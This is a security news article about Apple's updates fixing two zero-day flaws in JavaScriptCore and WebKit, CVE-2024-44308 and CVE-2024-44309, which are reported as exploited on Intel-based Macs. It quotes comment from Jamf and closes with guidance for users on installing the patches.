Apple has dropped a series of software updates across its various product lines as it aims to ward off the impact of two newly discovered zero-days, both of which may have already been exploited in the wild.
The fixes for CVE-2024-44308 and CVE-2024-44309 – both attributed to Clément Lecigne and Benoît Sevens of the Google Threat Analysis Group – affect devices running iOS and iPadOS 17.7.2 and 18.1.1, macOS Sequoia 15.1.1, and visionOS 2.1.1. They are also present in Safari 18.1.1.
CVE-2024-44308 affects the JavaScriptCore framework and enables a threat actor to achieve arbitrary code execution if the target device can be made to process maliciously crafted web content. According to Apple, there are reports that it has already been actively exploited on Intel-based Mac systems.
CVE-2024-44309 affects the open source WebKit browser engine used extensively within the Apple ecosystem, and is described as a cookie management issue that enabled a threat actor to conduct a cross-site scripting (XSS) attack.
In an XSS attack, a threat actor is able to insert malicious data into content from trusted websites, which is then included with content delivered to the victim’s browser. They can be used to achieve a number of goals, including session cookie theft enabling the threat actor to masquerade as the victim, but are also used to spread malware and steal credentials.
Again, there are reports of in-the-wild exploitation of CVE-2024-44309 against Intel-based Macs.
WebKit at risk
Michael Covington, vice-president of strategy at Jamf, a device management company specialising in Apple products, said that it is very important for defenders to promptly address vulnerabilities in WebKit, given the framework’s criticality to the Safari web browser.
“The fixes provided by Apple introduce stronger checks to detect and prevent malicious activity, as well as improve how devices manage and track data during web browsing. With attackers potentially exploiting both vulnerabilities, it is critical that users and mobile-first organisations apply the latest patches as soon as they are able,” said Covington.
CVE-2024-44309 is not the first issue to affect WebKit identified this year. In late January Apple patched CVE-2024-23222 – which also made it into the US’ Cybersecurity and Infrastructure Security Agency’s (CISA’s) Known Exploited Vulnerabilities (KEV) catalogue.
Also exploited as a zero-day, CVE-2024-23222 was a type confusion flaw leading to arbitrary code execution on the vulnerable device
As ever, Apple has provided scant detail on either of these vulnerabilities or how they have been taken advantage of. However, their identification by Google teams that have previously worked on vulnerabilities exploited by predatory commercial spyware vendors – such as disgraced Israeli firm NSO – may indicate the sort of people to whom these new flaws may be of interest.
Apple remains alert to such issues, and notably issued a security alert to iOS users in over 90 countries back in April, after detecting that they were being targeted by a mercenary spyware attack that was remotely compromising their devices.
As usual, Apple users who have not enabled automated updates can download the patches by navigating to their device’s Settings menu, then to General, then to Software Update.